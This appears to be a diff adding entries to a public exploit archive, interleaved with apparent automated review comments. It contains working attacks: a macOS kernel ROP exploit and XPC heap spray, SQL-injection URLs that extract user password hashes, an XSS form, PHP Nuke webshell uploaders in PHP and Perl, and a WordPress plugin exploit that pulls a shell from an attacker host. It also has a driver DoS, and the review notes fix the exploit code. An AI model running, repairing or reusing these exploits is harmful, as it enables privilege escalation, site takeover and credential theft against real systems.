xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
xpc_array_append_value(conn_list, arr_dict);
xpc_dictionary_set_value(params, "connection_entry_list", conn_list);
char* long_key = malloc(1024);
memset(long_key, 'A', 1023);
long_key[1023] = '\x00';
xpc_dictionary_set_string(params, long_key, "something or other that's not important");
uint64_t uuid[] = {0, 0x120200000};
xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
xpc_dictionary_set_uint64(params, "start", 0);
xpc_dictionary_set_uint64(params, "duration", 0);
xpc_dictionary_set_value(msg, "parameters", params);
xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_int64(state, "power_slot", 0);
xpc_dictionary_set_value(msg, "state", state);
xpc_object_t conn = connect();
printf("connected\n");
xpc_connection_send_message(conn, msg);
printf("enqueued message\n");
xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
xpc_release(msg);
}
int main(){
go();
printf("entering CFRunLoop\n");
for(;;){
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
}
return 0;
}
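Review bot: In `go`, the `mmap(..., MAP_FIXED, ...)` of the spray page at 0x120202000 is never checked, so if that address cannot be mapped `hs` is `MAP_FAILED` and the following `memset` segfaults before any message is sent; add `if (hs == MAP_FAILED) { perror("mmap"); exit(1); }`, and likewise check the `err` that `find_library_load_address` stores from `task_info` and then ignores. The CoreFoundation offsets `0x46ef0`, `0x46ef7` and `0x2226` are gadget addresses tied to one library build, and the file never records which OS X version they were taken from; a header comment such as `// CoreFoundation gadget offsets are specific to the tested OS X build (version not recorded here); re-derive them for any other build` would save the next reader a dead run. The literal `3` passed as `prot` to mmap would read better as `PROT_READ|PROT_WRITE`, and `DBL_MAX` in `main` is used without an explicit `<float.h>` include, which currently works only if a CoreFoundation header pulls it in.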

323
platforms/osx/local/35848.c Executable file

@ -0,0 +1,323 @@
// clang -o ig_2_3_exploit ig_2_3_exploit.c -framework IOKit -framework CoreFoundation -m32 -D_FORTIFY_SOURCE=0
// ianbeer
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <CoreFoundation/CoreFoundation.h>
#include <IOKit/IOKitLib.h>
uint64_t kernel_symbol(char* sym){
char cmd[1024];
strcpy(cmd, "nm -g /mach_kernel | grep ");
strcat(cmd, sym);
strcat(cmd, " | cut -d' ' -f1");
FILE* f = popen(cmd, "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
return offset;
}
uint64_t leaked_offset_in_kext(){
FILE* f = popen("nm -g /System/Library/Extensions/IONDRVSupport.kext/IONDRVSupport | grep __ZTV17IONDRVFramebuffer | cut -d' ' -f1", "r");
char offset_str[17];
fread(offset_str, 16, 1, f);
pclose(f);
offset_str[16] = '\x00';
uint64_t offset = strtoull(offset_str, NULL, 16);
offset += 0x10; //offset from symbol to leaked pointer
return offset;
}
uint64_t leak(){
io_iterator_t iter;
CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
kIOServicePlane,
CFSTR("AAPL,iokit-ndrv"),
kCFAllocatorDefault,
kIORegistryIterateRecursively);
if (CFGetTypeID(p) != CFDataGetTypeID()){
printf("expected CFData\n");
return 1;
}
if (CFDataGetLength(p) != 8){
printf("expected 8 bytes\n");
return 1;
}
uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
return leaked;
}
extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
uint64_t kext_load_addr(char* target_name){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, target_name) == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t load_addr(){
uint64_t addr = 0;
CFDictionaryRef kd = OSKextCopyLoadedKextInfo(NULL, NULL);
CFIndex count = CFDictionaryGetCount(kd);
void **keys;
void **values;
keys = (void **)malloc(sizeof(void *) * count);
values = (void **)malloc(sizeof(void *) * count);
CFDictionaryGetKeysAndValues(kd,
(const void **)keys,
(const void **)values);
for(CFIndex i = 0; i < count; i++){
const char *name = CFStringGetCStringPtr(CFDictionaryGetValue(values[i], CFSTR("CFBundleIdentifier")), kCFStringEncodingMacRoman);
if (strcmp(name, "com.apple.iokit.IONDRVSupport") == 0){
CFNumberGetValue(CFDictionaryGetValue(values[i],
CFSTR("OSBundleLoadAddress")),
kCFNumberSInt64Type,
&addr);
printf("%s: 0x%016llx\n", name, addr);
break;
}
}
return addr;
}
uint64_t* build_vtable(uint64_t kaslr_slide, size_t* len){
uint64_t kernel_base = 0xffffff8000200000;
kernel_base += kaslr_slide;
int fd = open("/mach_kernel", O_RDONLY);
if (!fd)
return NULL;
struct stat _stat;
fstat(fd, &_stat);
size_t buf_len = _stat.st_size;
uint8_t* buf = mmap(NULL, buf_len, PROT_READ, MAP_FILE|MAP_PRIVATE, fd, 0);
if (!buf)
return NULL;
/*
this stack pivot to rax seems to be reliably present across mavericks versions:
push rax
add [rax], eax
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
uint8_t pivot_gadget_bytes[] = {0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e};
uint8_t* pivot_loc = memmem(buf, buf_len, pivot_gadget_bytes, sizeof(pivot_gadget_bytes));
uint64_t pivot_gadget_offset = (uint64_t)(pivot_loc - buf);
printf("offset of pivot gadget: %p\n", pivot_gadget_offset);
uint64_t pivot = kernel_base + pivot_gadget_offset;
/*
pop rdi
ret
*/
uint8_t pop_rdi_ret_gadget_bytes[] = {0x5f, 0xc3};
uint8_t* pop_rdi_ret_loc = memmem(buf, buf_len, pop_rdi_ret_gadget_bytes, sizeof(pop_rdi_ret_gadget_bytes));
uint64_t pop_rdi_ret_gadget_offset = (uint64_t)(pop_rdi_ret_loc - buf);
printf("offset of pop_rdi_ret gadget: %p\n", pop_rdi_ret_gadget_offset);
uint64_t pop_rdi_ret = kernel_base + pop_rdi_ret_gadget_offset;
/*
pop rsi
ret
*/
uint8_t pop_rsi_ret_gadget_bytes[] = {0x5e, 0xc3};
uint8_t* pop_rsi_ret_loc = memmem(buf, buf_len, pop_rsi_ret_gadget_bytes, sizeof(pop_rsi_ret_gadget_bytes));
uint64_t pop_rsi_ret_gadget_offset = (uint64_t)(pop_rsi_ret_loc - buf);
printf("offset of pop_rsi_ret gadget: %p\n", pop_rsi_ret_gadget_offset);
uint64_t pop_rsi_ret = kernel_base + pop_rsi_ret_gadget_offset;
/*
pop rdx
ret
*/
uint8_t pop_rdx_ret_gadget_bytes[] = {0x5a, 0xc3};
uint8_t* pop_rdx_ret_loc = memmem(buf, buf_len, pop_rdx_ret_gadget_bytes, sizeof(pop_rdx_ret_gadget_bytes));
uint64_t pop_rdx_ret_gadget_offset = (uint64_t)(pop_rdx_ret_loc - buf);
printf("offset of pop_rdx_ret gadget: %p\n", pop_rdx_ret_gadget_offset);
uint64_t pop_rdx_ret = kernel_base + pop_rdx_ret_gadget_offset;
munmap(buf, buf_len);
close(fd);
/*
in IOAcceleratorFamily2
two locks are held - r12 survives the pivot, this should unlock all the locks from there:
__text:0000000000006F80 lea rsi, unk_32223
__text:0000000000006F87 mov rbx, [r12+118h]
__text:0000000000006F8F mov rax, [rbx]
__text:0000000000006F92 mov rdi, rbx
__text:0000000000006F95 xor edx, edx
__text:0000000000006F97 call qword ptr [rax+858h]
__text:0000000000006F9D mov rdi, rbx ; this
__text:0000000000006FA0 call __ZN22IOGraphicsAccelerator211unlock_busyEv ; IOGraphicsAccelerator2::unlock_busy(void)
__text:0000000000006FA5 mov rdi, [rbx+88h]
__text:0000000000006FAC call _IOLockUnlock
__text:0000000000006FB1
__text:0000000000006FB1 loc_6FB1: ; CODE XREF: IOAccelContext2::clientMemoryForType(uint,uint *,IOMemoryDescriptor **)+650j
__text:0000000000006FB1 xor ecx, ecx
__text:0000000000006FB3 jmp loc_68BC
...
__text:00000000000068BC mov eax, ecx ; jumptable 00000000000067F1 default case
__text:00000000000068BE add rsp, 38h
__text:00000000000068C2 pop rbx
__text:00000000000068C3 pop r12
__text:00000000000068C5 pop r13
__text:00000000000068C7 pop r14
__text:00000000000068C9 pop r15
__text:00000000000068CB pop rbp
__text:00000000000068CC retn
*/
uint64_t unlock_locks = kext_load_addr("com.apple.iokit.IOAcceleratorFamily2") + kaslr_slide + 0x6f80;
printf("0x%016llx\n", unlock_locks);
uint64_t KUNCExecute = kernel_symbol("_KUNCExecute") + kaslr_slide;
uint64_t thread_exception_return = kernel_symbol("_thread_exception_return") + kaslr_slide;
//char* payload = "/Applications/Calculator.app/Contents/MacOS/Calculator";
char* payload = "/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal";
uint64_t rop_stack[] = {
0, //pop r14
0, //pop r15
0, //pop rbp +10
unlock_locks,
pivot, //+20 virtual call is rax+20
0, //+10
0, //+18
0,
0, //+28
0,
0, //+38
0, //pop rbx
0, //pop r12
0, //pop r13
0, //pop r14
0, //pop r15
0, //pop rbp
pop_rdi_ret,
(uint64_t)payload,
pop_rsi_ret,
0,
pop_rdx_ret,
0,
KUNCExecute,
thread_exception_return
};
uint64_t* r = malloc(sizeof(rop_stack));
memcpy(r, rop_stack, sizeof(rop_stack));
*len = sizeof(rop_stack);
return r;
}
void trigger(void* vtable, size_t vtable_len){
//need to overallocate and touch the pages since this will be the stack:
mach_vm_address_t addr = 0x41420000 - 10 * 0x1000;
mach_vm_allocate(mach_task_self(), &addr, 0x20*0x1000, 0);
memset(addr, 0, 0x20*0x1000);
memcpy((void*)0x41420000, vtable, vtable_len);
//map NULL page
vm_deallocate(mach_task_self(), 0x0, 0x1000);
addr = 0;
vm_allocate(mach_task_self(), &addr, 0x1000, 0);
char* np = 0;
for (int i = 0; i < 0x1000; i++){
np[i] = 'A';
}
volatile uint64_t* zero = 0;
*zero = 0x41420000;
//trigger vuln
CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
io_iterator_t iterator;
kern_return_t err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
io_service_t service = IOIteratorNext(iterator);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), 2, &conn);
addr = 0x12345000;
mach_vm_size_t size = 0x1000;
err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
}
int main() {
uint64_t leaked_ptr = leak();
uint64_t kext_load_addr = load_addr();
// get the offset of that pointer in the kext:
uint64_t offset = leaked_offset_in_kext();
// sanity check the leaked address against the symbol addr:
if ( (leaked_ptr & 0xfff) != (offset & 0xfff) ){
printf("the leaked pointer doesn't match up with the expected symbol offset\n");
return 1;
}
uint64_t kaslr_slide = (leaked_ptr - offset) - kext_load_addr;
printf("kaslr slide: %p\n", kaslr_slide);
size_t vtable_len = 0;
void* vtable = build_vtable(kaslr_slide, &vtable_len);
trigger(vtable, vtable_len);
return 0;
}

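--- a/platforms/php/remote/35855.txt
+++ b/platforms/php/remote/35855.txt
@@ -0,0 +1,41 @@
+source: http://www.securityfocus.com/bid/48259/info
+PHP is prone to a security-bypass vulnerability.
+Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
+PHP 5.3.6 is vulnerable; other versions may also be affected.
+HTTP Request:
+====
+POST /file-upload-fuzz/recv_dump.php HTTP/1.0
+host: blog.security.localhost
+content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
+content-length: 200
+------------ThIs_Is_tHe_bouNdaRY_$
+Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
+Content-Type: text/plain
+any
+------------ThIs_Is_tHe_bouNdaRY_$--
+HTTP Response:
+====
+HTTP/1.1 200 OK
+Date: Fri, 27 May 2011 11:35:08 GMT
+Server: Apache/2.2.14 (Ubuntu)
+X-Powered-By: PHP/5.3.2-1ubuntu4.9
+Content-Length: 30
+Connection: close
+Content-Type: text/html
+/anything.here.slash-will-pass
+PHP script:
+=====
+<?php
+if (!empty($_FILES['contents'])) { // process file upload
+echo $_FILES['contents']['name'];
+unlink($_FILES['contents']['tmp_name']);
+}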
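Review bot: The receiving script at the end echoes `$_FILES['contents']['name']` verbatim, which is exactly the value the captured request shows arriving with a leading slash; the application-side mitigation is to normalise it with `basename()` before any path use, `$name = basename($_FILES['contents']['name']);`, and to pass it through `htmlspecialchars()` before echoing it into a `text/html` response. The header states that PHP 5.3.6 is vulnerable, while the captured response reports `X-Powered-By: PHP/5.3.2-1ubuntu4.9`, so the tested version should be stated consistently in the advisory text.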


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/48166/info
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1


@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/48215/info
The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
<html>
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="url" value="1" />
<input type="hidden" name="email" value=&#039;%F6"+onmouseover=prompt(31337)&#039; />
<input type="hidden" name="button" value="Send%20Details" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
</body>
</html>
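Review bot: The link text on the second-to-last line opens `<h3>` twice and never closes it (`<h3><br /><br />Exploit!<h3>`); the second tag should be `</h3>`. The `<center>`, `<font>` and `<b>` elements on that line are also closed in a different order from the one they were opened in, so the PoC page is not well-formed HTML even though browsers will still render it.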


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/48217/info
Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?tip=art&id=2' <- blind sql


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/48223/info
Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--

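--- a/platforms/php/webapps/35840.txt
+++ b/platforms/php/webapps/35840.txt
@@ -0,0 +1,62 @@
+???# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
+# Date: 11-05-2014
+# Exploit Author: shyamkumar somana
+# Vendor Homepage: http://redaxscript.com/
+# Version: 2.1.0
+# Tested on: Windows 8
+#Privilege Escalation in RedaxScript 2.1.0
+RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
+issue occurs because the application fails to properly implement access
+controls. The application also fails to perform proper sanity checks on the
+user supplied input before processing it. These two flaws led to a
+vertical privilege escalation. This can be achieved by a simply tampering
+the parameter values. An attacker can exploit this issue to gain elevated
+privileges to the application.
+*Steps to reproduce the instance:*
+· login as a non admin user
+· Go to account and update the account.
+· intercept the request and add “*groups[]=1*” to the post data and
+submit the request
+· Log out of the application and log in again. You can now browse
+the application with admin privileges.
+This vulnerability was addressed in the following commit.
+https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
+*Timeline*:
+09-26-2014: Issue identified
+09-27-2014: Discussion with the vendor
+10-27-2014: Issue confirmed
+11-05-2014: Patch released.
+Author: Shyamkumar Somana
+Vendor Homepage: http://redaxscript.com/download
+Version: 2.1.0
+Tested on: Windows 7
+--
+[image: --]
+shyam kumar
+[image: http://]about.me/shyamkumar.somana
+<http://about.me/shyamkumar.somana?promo=email_sig>
+Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
+in.linkedin.com/in/sshyamkumar/ |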
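Review bot: The first line of the file arrives as `???# Exploit Title: ...`; the leading `???` is most likely a mangled UTF-8 byte-order mark and should be stripped from the archived copy so the `#` header line reads like the others. The header block contradicts itself, `Tested on: Windows 8` near the top against `Tested on: Windows 7` further down, and `Date: 11-05-2014` matches the patch-release entry in the timeline rather than the discovery date, so one of the two should be corrected or labelled. The trailing e-mail signature with a personal phone number and social-media links is not part of the advisory and should be dropped before archiving.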

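--- a/platforms/php/webapps/35846.txt
+++ b/platforms/php/webapps/35846.txt
@@ -0,0 +1,118 @@
+Mogwai Security Advisory MSA-2015-01
+----------------------------------------------------------------------
+Title: WP Pixarbay Images Multiple Vulnerabilities
+Product: Pixarbay Images (Wordpress Plugin)
+Affected versions: 2.3
+Impact: high
+Remote: yes
+Product link: https://wordpress.org/plugins/pixabay-images/
+Reported: 14/01/2015
+by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
+Vendor's Description of the Software:
+----------------------------------------------------------------------
+Pixabay Images is a WordPress plugin that let's you pick CC0 public
+domain pictures from Pixabay and insert them with just a click anywhere
+on your blog. The images are safe to use, and paying attribution or
+linking back to the source is not required.
+Business recommendation:
+----------------------------------------------------------------------
+Update to version 2.4
+Vulnerability description:
+----------------------------------------------------------------------
+1) Authentication bypass
+The plugin does not correctly check if the user is logged in. Certain
+code can be called without authentication
+2) Arbitrary file upload
+The plugin code does not validate the host in the provided download URL,
+which allows to upload malicious files, including PHP code.
+3) Path Traversal
+Certain values are not sanitized before they are used in a file operation.
+This allows to store files outside of the "download" folder.
+4) Cross Site Scripting (XSS)
+The generated author link uses unsanitized user values which can be
+abused for Cross Site Scripting (XSS) attacks.
+Proof of concept:
+----------------------------------------------------------------------
+The following PoC Python script can be used to download PHP files from
+a attacker controlled host.
+#!/usr/bin/env python
+import argparse
+import httplib, urllib
+from urlparse import urlparse
+def exploit(target_url, shellcode_url):
+target = urlparse(target_url)
+params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
+'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
+headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
+print "[+] Sending download request...."
+conn = httplib.HTTPConnection(target.netloc)
+conn.request("POST", target.path + "/wp-admin/", params, headers)
+response = conn.getresponse()
+response_data = response.read()
+if response.status != 200 and response_data != "Error: File attachment metadata
+error":
+print "[-] Something went wrong"
+print response_data
+exit()
+conn.close()
+# ---- Main code ----------------
+parser = argparse.ArgumentParser()
+parser.add_argument("target_url", help="The target url, for example
+http://foo.bar/blog/")
+parser.add_argument("shellcode_url", help="The url of the PHP file that should
+be uploaded, for example: http://attacker.com/shell.php")
+print "----------------------------------------------"
+print " pixabay upload wordpress plugin exploit PoC"
+print " Mogwai security"
+print "----------------------------------------------"
+arguments = parser.parse_args()
+exploit(arguments.target_url, arguments.shellcode_url)
+Vulnerable / tested versions:
+----------------------------------------------------------------------
+Pixabay Images 2.3
+Disclosure timeline:
+----------------------------------------------------------------------
+14/01/2014: Reporting issues to the plugin author
+15/01/2014: Release of fixed version (2.4)
+19/01/2014: Public advisory
+Advisory URL:
+----------------------------------------------------------------------
+https://www.mogwaisecurity.de/#lab
+----------------------------------------------------------------------
+Mogwai, IT-Sicherheitsberatung Muench
+Steinhoevelstrasse 2/2
+89075 Ulm (Germany)
+info@mogwaisecurity.de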
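Review bot: Three string literals in the PoC are broken across lines — the comparison `response_data != "Error: File attachment metadata` / `error":` and both `help="..."` arguments — so the script as archived is a Python SyntaxError; the lines look like mail-client wrapping and need rejoining onto one line each. `headers = headers = {...}` is a doubled assignment that should read `headers = {...}`, and the `and` in `if response.status != 200 and response_data != ...` most likely intends `or`, because as written a non-200 response with any other body is treated as success. The disclosure timeline is dated 2014 while the report date and advisory id say 2015, and the title spells the product `Pixarbay` where the product link and body use `Pixabay`.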

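--- a/platforms/php/webapps/35851.txt
+++ b/platforms/php/webapps/35851.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/48233/info
+WebFileExplorer is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+WebFileExplorer 3.6 is vulnerable; other versions may also be affected.
+Supplying the following input to the username or password field is sufficient to exploit these issues:
+user: admin' or '1=1
+pass: anything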

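--- a/platforms/php/webapps/35853.php
+++ b/platforms/php/webapps/35853.php
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/48257/info
+Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+Phpnuke 8.3 is vulnerable; other versions may also be affected.
+<?php
+///////////////////////////////////////////////////
+#Iranian Pentesters Home
+#PHP Nuke 8.3 MT AFU Vulnerability
+#Coded by:4n0nym0us & b3hz4d
+#http://www.pentesters.ir
+///////////////////////////////////////////////////
+//Settings:
+$address = 'http://your-target.com';
+$file = 'shell.php.01';
+$prefix='pentesters_';
+//Exploit:
+@$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00";
+@$file_data .= file_get_contents($file);
+file_put_contents($prefix . $file, $file_data);
+$file = $prefix . $file;
+echo "\n" . "///////////////////////////////////" ."\n";
+echo " Iranian Pentesters Home" . "\n";
+echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n";
+echo "///////////////////////////////////" ."\n";
+$address_c = $address . '/includes/richedit/upload.php';
+$postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1");
+$data = post_data($address_c, $postdata);
+$start = strpos($data, "<img src=\"upload");
+if ($start != null)
+{
+$data = substr($data,$start + 10);
+$end = strpos($data, "\"");
+$data = substr($data,0,$end);
+echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n";
+}
+else
+echo "\n" . "Upload Failed!!!";
+function post_data($address, $data)
+{
+$curl = curl_init($address);
+curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)");
+curl_setopt($curl, CURLOPT_POST, 1);
+curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
+curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
+$content = curl_exec($curl);
+curl_close($curl);
+return $content;
+}
+?>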
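Review bot: `if ($start != null)` after the `strpos` call misreads PHP's return contract — `strpos` returns `false` when the marker is absent and an integer offset otherwise, and `0 != null` is also false, so the idiomatic check is `if ($start !== false)`. The `@` operators on the two `$file_data` assignments suppress the only diagnostic a missing input file would produce; the `file_get_contents` result should be tested for `false` instead. `post_data` returns whatever `curl_exec` gives back, which is `false` on a transport error, and the caller feeds that straight into `strpos` without a check. The prose header lines before `<?php` are part of a file with a `.php` extension, so the archived copy is not runnable as-is.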

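--- a/platforms/php/webapps/35854.pl
+++ b/platforms/php/webapps/35854.pl
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/48257/info
+Phpnuke is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.
+Phpnuke 8.3 is vulnerable; other versions may also be affected.
+#!/usr/bin/perl
+###################################################
+#//Iranian Pentesters Home
+#//PHP Nuke 8.3 MT AFU Vulnerability
+#//Coded by:4n0nym0us & b3hz4d
+#//http://www.pentesters.ir
+###################################################
+use LWP;
+use HTTP::Request::Common;
+print "\n" . "///////////////////////////////////" ."\n";
+print " Iranian Pentesters Home" . "\n";
+print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n";
+print "///////////////////////////////////" ."\n";
+print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n";
+my $url = $ARGV[0]."/includes/richedit/upload.php";
+my $filename = $ARGV[1];
+my $prefix = $ARGV[2];
+my $rfile = $prefix . $filename . ".gif";
+open fhandle, $ARGV[1] or die $!;
+while (<fhandle>){
+$shell .= $_;
+}
+close fhandle;
+open fhandle, ">", $rfile or die $!;
+print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell;
+close(fhandle);
+my $ua = LWP::UserAgent->new;
+$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026");
+my $req = POST $url, Content_Type => 'form-data',
+Content => [
+upload => "1",
+path => 'images',
+pwd => "1",
+userfile => [ $rfile,$prefix . $filename ]
+];
+my $res = $ua->request($req);
+$between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12);
+print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between);
+exit;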
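Review bot: The script runs without `use strict; use warnings;`, so `$shell` and `$between` are undeclared globals and `fhandle` is a bareword filehandle; `my $shell = '';` and a lexical handle in three-argument form, `open my $fh, '<', $ARGV[1] or die $!;`, are the idiomatic forms. It prints a Syntax line but never checks `@ARGV`, so a missing argument silently turns into an undefined filename and an `undef` prefix. The `substr`/`index` expression near the end assumes both markers are present in the response; `index` returns -1 when one is missing, which produces a meaningless slice instead of an error message. Like the PHP variant, the prose header lines before `#!/usr/bin/perl` make the archived `.pl` file non-runnable as-is.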

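--- a/platforms/windows/dos/35842.c
+++ b/platforms/windows/dos/35842.c
@@ -0,0 +1,71 @@
+/*
+Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
+Date - 19th January 2015
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - https://www.malwarebytes.org
+Tested Version - 1.03.1.1220, 1.04.1.1012
+Driver Version - no version set - mbae.sys
+Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
+OSVDB - http://www.osvdb.org/show/osvdb/114249
+CVE ID - CVE-2014-100039
+Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
+Fixed version - 1.05
+Fixed driver ver - no version set
+*/
+#include <stdio.h>
+#include <windows.h>
+#define BUFSIZE 25
+int main(int argc, char *argv[])
+{
+HANDLE hDevice;
+char devhandle[MAX_PATH];
+DWORD dwRetBytes = 0;
+BYTE sizebytes[4] = "\xff\xff\xff\x00";
+BYTE *inbuffer;
+printf("-------------------------------------------------------------------------------\n");
+printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
+printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
+printf("-------------------------------------------------------------------------------\n\n");
+sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
+inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+memset(inbuffer, 0x41, BUFSIZE);
+memcpy(inbuffer, sizebytes, sizeof(sizebytes));
+printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
+hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+if(hDevice == INVALID_HANDLE_VALUE)
+{
+printf("\n[-] Open %s device failed\n\n", devhandle);
+return -1;
+}
+else
+{
+printf("\n[+] Open %s device successful", devhandle);
+}
+printf("\n[~] Press any key to DoS . . .");
+getch();
+DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
+printf("\n[+] DoS buffer sent\n\n");
+CloseHandle(hDevice);
+return 0;
+}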
